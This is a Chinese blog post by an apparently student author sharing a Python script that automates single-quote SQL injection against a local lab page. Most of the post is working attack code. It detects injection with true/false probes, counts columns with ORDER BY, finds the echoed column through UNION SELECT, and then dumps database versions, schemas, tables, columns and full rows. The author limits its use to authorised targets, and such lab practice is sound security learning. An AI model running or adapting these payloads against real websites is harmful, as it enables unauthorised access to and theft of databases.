
SQL注入自动化python脚本


写了一个 python3 的 SQL 注入脚本（针对本地靶场的单引号字符型注入）。注意：脚本会向目标发送真实的注入请求并留下日志，只能用于自己搭建的靶场或已获授权的测试目标。
临近毕业,尝试写一些自动注入和自动扫描的脚本
发现还是不够自动
后面我再改改。现在脖子疼
实现效果
代码如下:

import requests
from bs4 import BeautifulSoup
from colorama import init, Fore, Back, Style
import sys
import time
import urllib.parse
import re
from prettytable import PrettyTable

init(autoreset=True)  # colorama setup; autoreset keeps colour codes from bleeding past the end of each print


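class Colored(object):
    """Thin wrapper around colorama's Fore/Back codes.

    Every method wraps *s* in the named foreground (and optionally background)
    colour and appends the matching RESET, so a coloured fragment can be
    concatenated mid-line without colouring what follows it.
    """

    @staticmethod
    def _fg(code, s):
        # One helper so every foreground method has exactly the same shape.
        return code + s + Fore.RESET

    def red(self, s):
        return self._fg(Fore.RED, s)

    def green(self, s):
        return self._fg(Fore.GREEN, s)

    def yellow(self, s):
        return self._fg(Fore.YELLOW, s)

    def blue(self, s):
        return self._fg(Fore.BLUE, s)

    def magenta(self, s):
        return self._fg(Fore.MAGENTA, s)

    def cyan(self, s):
        return self._fg(Fore.CYAN, s)

    def white(self, s):
        return self._fg(Fore.WHITE, s)

    def black(self, s):
        # Fixed: the original returned Fore.BLACK alone, dropping *s* and
        # leaving the terminal foreground black for everything printed after.
        return self._fg(Fore.BLACK, s)

    def white_green(self, s):
        """White text on a green background; resets both channels."""
        return Fore.WHITE + Back.GREEN + s + Fore.RESET + Back.RESET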


color = Colored()  # shared colour helper used by every log line in this file


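def _log(tag, tag_color, message, end="\n"):
    """Print one ``[HH:MM:SS][tag]message`` line in the script's colour scheme.

    tag_color is one of the bound ``color.*`` methods (e.g. ``color.magenta``).
    """
    print(
        color.white("[")
        + color.blue(time.strftime("%H:%M:%S"))
        + color.white("]")
        + color.white("[")
        + tag_color(tag)
        + color.white("]")
        + message,
        end=end,
    )


def _fetch(target, timeout):
    """GET *target* and return the decoded body.

    ``.text`` is used instead of ``str(response.content)``: the latter is the
    *repr* of a bytes object, so every non-ASCII byte is rendered as ``\\xNN``
    and its hex digits pollute the marker-digit counts and slice offsets used
    below. A timeout is always set; requests has none by default.
    """
    return requests.get(target, timeout=timeout).text


def _strip_markup(fragment):
    """Return *fragment* cut at the first ``<`` or ``"``, whichever comes first.

    The injected group_concat() text is sliced straight out of HTML, so the
    next tag or attribute boundary marks the end of the data. (The original
    cut at ``"`` even when a ``<`` came earlier, and crashed on
    ``str.find(...)[0]`` because find() returns an int.)
    """
    end = len(fragment)
    for stop in ("<", '"'):
        pos = fragment.find(stop)
        if pos != -1 and pos < end:
            end = pos
    return fragment[:end]


def _slice_echo(body, left, right_text):
    """Return the text echoed at offset *left* in *body*, ending at *right_text*.

    *left* is where the marker digit was rendered in the ``union select 1,2,3``
    probe and *right_text* the 16 characters that followed it; injected data
    replaces the marker, so it spans ``body[left:body.find(right_text)]``.
    Returns '' when the anchor is missing (no row rendered) instead of slicing
    to -1 as the original did.
    """
    right = body.find(right_text, left)
    if right == -1:
        return ""
    return _strip_markup(body[left:right])


def _find_column_count(url, baseline_len, timeout, max_cols=14):
    """Return the first ORDER BY index (1..max_cols) whose response length
    differs from the ``and 1=1`` baseline, or 0 if none does.

    ORDER BY n errors once n exceeds the column count, so the first index that
    changes the page is (column count + 1). A 0 means no index changed the
    page, i.e. errors are not rendered and blind techniques are needed. The
    scan stops at 14, as the original did.
    """
    for idx in range(1, max_cols + 1):
        body = _fetch(url + "%27/**/order/**/by/**/" + str(idx) + "--+", timeout)
        if len(body) != baseline_len:
            return idx
    return 0


def _dump_via_union(no_param_url, key, value, echo_col, probe_body, timeout):
    """Interactively dump version, schemas, tables, columns and rows through
    the UNION SELECT column that the page echoes.

    echo_col (1, 2 or 3) is the marker from ``union select 1,2,3`` that
    rendered exactly once; *probe_body* is that probe's response. Injected
    expressions are placed in that same column. (The original put data in
    column 1 but sliced at the position of marker '2', which only lines up
    when the echoed column happens to be 2; the column-3 branch was an empty
    ``pass``.)
    """
    marker = str(echo_col)
    left = probe_body.find(marker)
    right_text = probe_body[left + 1:left + 17]  # 16 chars after the marker, as before
    prefix = no_param_url + "?" + key + "=" + value + "%27/**/union/**/select/**/"

    def in_echo_column(expr):
        # Put *expr* where the page echoes it; the other two stay as markers.
        cols = ["1", "2", "3"]
        cols[echo_col - 1] = expr
        return ",".join(cols)

    def run(expr, from_clause=""):
        # Spaces are written as /**/ throughout so every payload survives the
        # same naive space filtering (the original mixed plain spaces in).
        target = prefix + in_echo_column(expr) + from_clause + "--+"
        _log("payload", color.magenta, color.white("正在执行") + color.green(target))
        return _slice_echo(_fetch(target, timeout), left, right_text)

    def ask(prompt):
        return input(
            color.white("[")
            + color.blue(time.strftime("%H:%M:%S"))
            + color.white("]")
            + color.white("[")
            + color.magenta("输入")
            + color.white("]")
            + color.yellow(prompt)
        )

    def show(heading, rows):
        table = PrettyTable([heading])
        for row in rows:
            table.add_row([row])
        print(table)

    version = run("version()")
    _log("Version", color.magenta, color.white("数据库版本  ") + color.green(version))
    show("Version", [version])

    databases = run("group_concat(schema_name)", "/**/from/**/information_schema.schemata")
    _log("database", color.magenta, color.yellow("数据库有\n"))
    show("Database", databases.split(","))
    inj_database = ask("请输入你要注入的数据库:")

    # The operator's answers are spliced into the SQL verbatim (this is the
    # attacking side, so that is the point); a quote in them breaks the query.
    tables = run(
        "group_concat(table_name)",
        '/**/from/**/information_schema.tables/**/where/**/table_schema="' + inj_database + '"',
    )
    _log("tables", color.magenta, color.yellow("表有\n"))
    show("Tables_in_" + inj_database, tables.split(","))
    inj_table = ask("请输入你要注入的表:")

    # Also filter on the chosen schema: the original matched table_name alone,
    # which merges the columns of same-named tables from every database.
    columns = run(
        "group_concat(column_name)",
        '/**/from/**/information_schema.columns/**/where/**/table_name="' + inj_table
        + '"/**/and/**/table_schema="' + inj_database + '"',
    )
    _log("columns", color.magenta, color.yellow("列有\n"))
    column_list = columns.split(",")

    # group_concat(c1," ",c2,...) joins one row's columns with spaces and
    # successive rows with commas, so the echo splits back into a grid.
    # Values that themselves contain ' ' or ',' will misalign — TODO use
    # rarer separators (e.g. 0x7c and a custom SEPARATOR).
    rows = run("group_concat(" + '," ",'.join(column_list) + ")", "/**/from/**/" + inj_table)
    grid = PrettyTable(column_list)
    width = len(column_list)
    for row in rows.split(","):
        cells = row.split(" ")
        if len(cells) != width:
            # PrettyTable raises on a ragged row; pad/trim so one odd value
            # does not abort the whole dump.
            cells = (cells + [""] * width)[:width]
        grid.add_row(cells)
    print(grid)


def single_quotes_injection(url, param_dict, no_param_url, *, timeout=10):
    """Probe one GET parameter for a string (single-quote) SQL injection and,
    if the page echoes a UNION SELECT column, dump the MySQL version, schemas,
    tables, columns and rows interactively.

    Args:
        url: the URL with its single parameter already attached (``...?id=1``);
            payload suffixes are concatenated straight onto it.
        param_dict: the parsed query parameters as returned (negated) by
            get_url_param(); only a one-entry dict is handled, anything else
            returns immediately.
        no_param_url: the URL without its query string, used to rebuild the
            UNION payloads from the negated parameter value.
        timeout: seconds per HTTP request, so a stalled target cannot hang
            the script.

    Returns:
        None. Results are printed; the database and table to dump are read
        from stdin.

    Every request sent here is a live injection attempt that will show up in
    the target's logs — only run it against hosts you are authorised to test.
    """
    if len(param_dict) != 1:
        # Multi-parameter URLs are not handled (the original silently did nothing too).
        return

    payload_true = url + "%27/**/and/**/1=1--+"   # always-true: page should look normal
    payload_false = url + "%27/**/and/**/1=2--+"  # always-false: page changes if the quote broke out
    for payload in (payload_true, payload_false):
        _log("payload", color.magenta, color.white("正在执行") + color.green(payload))
    response_true = requests.get(payload_true, timeout=timeout)
    response_false = requests.get(payload_false, timeout=timeout)
    if response_true.status_code != 200:
        # Only a hint: a WAF, an error page or a redirect all yield non-200.
        print(color.red("该网站可能部署了waf"))

    # Boolean-based check: a different body length for 1=1 vs 1=2 means the
    # injected condition reached the query. Equal lengths are reported as
    # "no injection" but only prove that this one probe was not detected.
    if len(response_true.text) == len(response_false.text):
        _log("返回", color.green, color.red("不存在sql注入"))
        return

    _log("INFO", color.green, color.yellow("可能存在sql注入漏洞"))
    _log("payload", color.magenta, color.green(payload_true))
    _log("payload", color.magenta, color.green(payload_false))
    _log("INFO", color.green, color.yellow("正在判断是否有回显"))

    column_num = _find_column_count(url, len(response_true.text), timeout)
    if column_num == 0:
        _log("INFO", color.green, color.red("未开启mysql_error()报错  可以尝试盲注"))
        return

    _log("INFO", color.green, color.yellow("存在回显"))
    _log("INFO", color.green, color.yellow("列长为") + color.cyan(str(column_num - 1)))
    suggested = (
        url
        + "%27/**/union/**/select/**/"
        + ",".join(str(col) for col in range(1, column_num))
        + "--+"
    )
    _log("payload", color.magenta, color.green(suggested))

    # NOTE: the echo probe hard-codes three columns (the layout the author
    # tested against) even though column_num was just measured, and it finds
    # the echoed column by looking for a marker digit that occurs exactly once
    # in the whole page — any stray '1'/'2'/'3' in the HTML (titles, CSS sizes)
    # defeats it. TODO: use column_num - 1 markers that cannot collide.
    key, value = next(iter(param_dict.items()))
    probe = no_param_url + "?" + key + "=" + value + "%27/**/union/**/select/**/1,2,3--+"
    probe_body = _fetch(probe, timeout)
    for echo_col in (1, 2, 3):
        if probe_body.count(str(echo_col)) == 1:
            _dump_via_union(no_param_url, key, value, echo_col, probe_body, timeout)
            return
    _log("INFO", color.green, color.red("未定位到回显列"))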
            



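def get_url_param(url):
    """Split *url* into its base, a negated copy of its query and a probe URL.

    Returns ``[base_url, negated_params, probe_url]``:

    * base_url — *url* up to (not including) the first ``?``.
    * negated_params — each query key mapped to ``'-' + value`` when the
      value is a positive integer, ``'-1'`` when it is zero or negative, and
      the unchanged value otherwise. A negative id makes the original row
      disappear so a later UNION SELECT's own columns are what the page echoes.
    * probe_url — ``base_url?key=abs(int(value))`` built from the *last*
      negated parameter, or *url* itself when that value is not an integer.
      (Only the last parameter survives, as in the original; the caller only
      handles single-parameter URLs anyway.)

    Prints an error and exits when the URL carries no query parameters —
    there is nothing to inject into. The original wrapped everything in a bare
    ``except:``, so a malformed URL was also reported as "no parameters" and
    the error exit code was 0; now only the empty-query case is handled here
    (exit 1) and other errors propagate with their traceback.
    """
    index = url.find("?")
    base_url = url if index < 0 else url[:index]
    url_param = dict(urllib.parse.parse_qsl(urllib.parse.urlsplit(url).query))
    if not url_param:
        print(
            color.white("[")
            + color.blue(time.strftime("%H:%M:%S"))
            + color.white("]")
            + color.white("[")
            + color.green("错误")
            + color.white("]")
            + color.red("没有参数可以注入")
        )
        sys.exit(1)

    negated = {}
    for key, value in url_param.items():
        try:
            number = int(value)
        except ValueError:
            negated[key] = value  # non-numeric values pass through untouched
        else:
            negated[key] = "-" + value if number > 0 else "-1"

    probe_url = url
    for key, value in negated.items():
        try:
            probe_url = base_url + "?" + key + "=" + str(abs(int(value)))
        except ValueError:
            probe_url = url  # non-numeric: probe the URL exactly as given
    return [base_url, negated, probe_url]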

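if __name__ == "__main__":
    # Target URL: first command-line argument, else the local lab URL the
    # author tested against. Every request this script sends is a live
    # injection attempt — only point it at hosts you are authorised to test.
    url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost/less-1/?id=1"
    no_param_url, json_param, param_url = get_url_param(url)
    single_quotes_injection(param_url, json_param, no_param_url)
    # TODO: number_injection('http://localhost/less-2/?id=1') — numeric-context variant, not written yet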